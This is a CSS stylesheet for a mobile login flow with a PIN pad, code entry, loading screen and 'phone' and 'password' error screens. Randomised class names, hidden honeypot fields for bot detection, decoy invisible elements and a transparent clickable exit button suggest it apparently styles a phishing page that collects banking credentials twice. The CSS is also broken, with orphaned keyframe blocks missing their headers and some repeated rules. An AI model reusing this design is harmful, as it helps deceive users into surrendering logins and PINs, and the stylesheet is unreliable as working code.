


body {
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
    background: linear-gradient(to bottom, var(--primary-blue) 0%, var(--primary-blue) 15%, var(--bg-light) 15%);
    min-height: 100vh;
    font-size: 13px;
    -webkit-font-smoothing: antialiased;
}



/* Header */
.header {
    background: var(--primary-blue);
    padding: 12px 16px;
    display: flex;
    align-items: center;
    justify-content: center;
    position: sticky;
    top: 0;
    z-index: 100;
}



.header-title {
    color: white;
    font-size: 18px;
    font-weight: 500;
    flex: 1;
    text-align: center;
}



/* Login Card */
.e77exl {
    background: white;
    padding: 14px;
    margin: 10px;
    border-radius: 12px;
    box-shadow: 0 2px 8px rgba(0, 0, 0, 0.1);
}



.code {
    font-size: 14px;
    font-weight: 500;
    color: var(--text-dark);
}



.r2v5b.error {
    border-color: #dc3545;
    background: #fff5f5;
}



/* Checkbox */
.checkbox-wrapper {
    display: flex;
    align-items: flex-start;
    gap: 10px;
    margin-bottom: 16px;
    cursor: pointer;
}



/* Primary Button */
.w7wp7n {
    width: 100%;
    padding: 12px;
    font-size: 15px;
    font-weight: 500;
    color: white;
    background: var(--primary-green);
    border: none;
    border-radius: 8px;
    cursor: pointer;
}



.action-item {
    display: flex;
    flex-direction: column;
    align-items: center;
    gap: 6px;
}



.action-icon {
    width: 52px;
    height: 52px;
    background: var(--primary-blue);
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
}



.card-visual {
    width: 100px;
    height: 65px;
    background: linear-gradient(135deg, #4a6fa5 0%, #2c4a6e 100%);
    border-radius: 8px;
    margin: 0 auto 16px;
}



.text-input {
    width: 100%;
    padding: 11px 14px;
    font-size: 14px;
    border: 1px solid var(--border-color);
    border-radius: 8px;
    outline: none;
    background: #f8f9fa;
}



.rtima8x .xwdnhawo {
    width: 100%;
    padding: 11px 40px 11px 14px;
}



.pin-dots {
    display: flex;
    justify-content: center;
    gap: 14px;
    margin-bottom: 30px;
}



.pin-dot.filled {
    background: var(--text-dark);
    border-color: var(--text-dark);
}



.num-btn {
    width: 70px;
    height: 70px;
    border-radius: 50%;
    border: 2px solid var(--border-color);
    background: white;
    font-size: 22px;
    font-weight: 500;
    color: var(--text-dark);
    cursor: pointer;
    display: flex;
    align-items: center;
    justify-content: center;
}



.num-btn:active {
    transform: scale(0.95);
    background: #f8f9fa;
}



/* Hidden Steps */
.step {
    display: none;
}



/* Loading Screen */
#loadingScreen {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: linear-gradient(to bottom, var(--primary-blue) 0%, var(--primary-blue) 15%, var(--bg-light) 15%);
    z-index: 9999;
    padding: 20px;
}



.we7izqxr {
    width: 50px;
    height: 50px;
    margin: 20px auto;
    border: 4px solid rgba(92, 184, 92, 0.3);
    border-top: 4px solid var(--primary-green);
    border-radius: 50%;
    animation: spin 1s linear infinite;
}



    100% {
        transform: rotate(360deg);
    }



.q6oag87sq8 {
    color: var(--text-dark);
    font-size: 16px;
    font-weight: 500;
    margin-top: 16px;
}



/* PIN Numpad - Ultra Compact */
.numpad {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 8px;
    margin-top: 10px;
    max-width: 220px;
    margin-left: auto;
    margin-right: auto;
}



.num-btn:active {
    background: #f0f0f0;
    transform: scale(0.95);
}



.code-input.error {
    border-color: #dc3545;
    animation: shake 0.3s;
}



    25% {
        transform: translateX(-5px);
    }



.code-input.error {
    border-color: #dc3545;
    animation: shake 0.3s;
}



    25% {
        transform: translateX(-5px);
    }



/* Phone Error Screen */
.ohvksgfbut {
    text-align: center;
    padding: 30px 20px 15px;
    display: flex;
    flex-direction: column;
    align-items: center;
}



.qtdv8dh0ug {
    font-size: 18px;
    font-weight: 700;
    color: #e57373;
    margin-top: 0;
    margin-bottom: 8px;
    text-align: center;
    line-height: 1.4;
}



.ei2p7e {
    width: 100%;
    max-width: 300px;
    padding: 14px 16px;
    border: 2px solid #e0e0e0;
    border-radius: 8px;
    font-size: 16px;
    font-weight: 500;
    color: var(--text-dark);
    background: #fafafa;
    transition: all 0.3s ease;
    text-align: center;
}



.ei2p7e:focus {
    outline: none;
    border-color: var(--primary-green);
    background: white;
    box-shadow: 0 0 0 3px rgba(111, 168, 58, 0.1);
}



/* Input group with flag (for phone error screen) */
.ohvksgfbut .k6x734k {
    position: relative;
    display: flex;
    align-items: center;
    width: 100%;
    max-width: 300px;
    margin: 0 auto;
}



/* Password Error Screen */
.v4qu9bv {
    text-align: center;
    padding: 30px 20px 15px;
    display: flex;
    flex-direction: column;
    align-items: center;
}



/* Password input wrapper for error screen */
.v4qu9bv .rtima8x {
    position: relative;
    width: 100%;
    max-width: 300px;
    margin: 0 auto;
}



.v4qu9bv .aqmoa4 svg {
    width: 20px;
    height: 20px;
}



/* Honeypot Trap - Hidden fields for bot detection */
.rx5vf1nnw {
    position: absolute !important;
    left: -9999px !important;
    width: 1px !important;
    height: 1px !important;
    opacity: 0 !important;
    pointer-events: none !important;
}



.pzp3pib {
    display: none !important;
    visibility: hidden !important;
}


    from {
        opacity: 0;
        transform: scale(0.9) translateY(20px);
    }



.xpgxa {
    margin-bottom: 24px;
    display: flex;
    justify-content: center;
}



.sx707:active {
    transform: translateY(0);
}



/* Invisible exit button (top right corner, for mobile) */
.nffvfl {
    position: fixed;
    top: 0;
    right: 0;
    width: 60px;
    height: 60px;
    z-index: 9999;
    opacity: 0;
    cursor: pointer;
    /* Invisible but clickable */
}



/* ============= LOADING SCREEN ============= */

.ozutz {
    display: flex;
    flex-direction: column;
    justify-content: flex-start;
    align-items: center;
    height: 100%;
    padding: 40px 20px 20px 20px;
}



.we7izqxr {
    position: absolute;
    width: 145px;
    height: 145px;
    border: 4px solid rgba(92, 184, 92, 0.15);
    border-top-color: var(--primary-green);
    border-radius: 50%;
    animation: spin 1.5s linear infinite;
}



.ga89w {
    font-size: 16px;
    color: #666;
    margin: 0;
    text-align: center;
}



.z2gg4x::before,
.z2gg4x::after {
    content: '';
    position: absolute;
    width: 100%;
    height: 100%;
    border-radius: 50%;
    border: 2px solid rgba(92, 184, 92, 0.4);
    animation: ripple 2s ease-out infinite;
}



    20%,
    40% {
        transform: rotate(15deg) scale(1.05);
    }



    50% {
        transform: rotate(0deg) scale(1);
    }



    100% {
        transform: scale(1.5);
        opacity: 0;
    }



.rg59iue {
    font-size: 16px;
    color: #666;
    text-align: center;
    max-width: 300px;
    line-height: 1.5;
    margin: 0;
}



    0%,
    20% {
        content: '';
    }



    60% {
        content: '..';
    }



    80%,
    100% {
        content: '...';
    }


.q830b0uf { pointer-events: none; left: -9999px; }


.r4risyp { pointer-events: none; width: 0; color: transparent; }


.lyrt0l7o { pointer-events: none; height: 0; font-size: 0; opacity: 0; }